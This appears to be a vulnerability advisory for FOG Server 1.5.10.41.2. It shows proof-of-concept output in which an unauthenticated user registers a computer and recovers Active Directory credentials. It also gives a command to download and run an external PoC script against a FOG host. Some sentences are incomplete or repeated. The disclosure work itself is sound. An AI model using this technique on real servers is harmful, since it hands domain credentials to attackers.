FOG Server 1.5.10.41.2 can leak AD username and password when registering a computer
username@localhost:~$ ./poc_FOG.sh "https://192.168.0.138/fog/"
PoC launched, FOG server is https://192.168.0.138/fog/
1.) Search for an existing image present on the server...
-> Image found "Win10_x64_v2", ID : 1
2.) Create a new computer in the database, with MAC+Name:01:CA:FE:AC:AA:65 ...
-> Done, with imaging!
3.) Scrape AD parameters...
- Try legacy method (#1)
----- AD parameters for FOG Server https://192.168.0.138/fog/ :
Domain : 'MY-DOMAINE'
Username : 'usr-fog-ad'
Password : 'MyPass(w0rd.exe)!'
All unauthenticated user is capable to execute this PoC and recover AD username and password.
Summary
FOG Server 1.5.10.41.2 can leak AD username and password when registering a computer
Details
FOS when registering a new computer manually, dosent check if the username/password used for tasking "download image".
PoC
Download this file : https://alexandre.botzung.fr/poc_FOG_E9XJUHi93f.sh, chmod +x it and
lauches with : ./poc_FOG_E9XJUHi93f.sh "http://<FOG_IP>/fog/"
Result should like :
Impact
All unauthenticated user is capable to execute this PoC and recover AD username and password.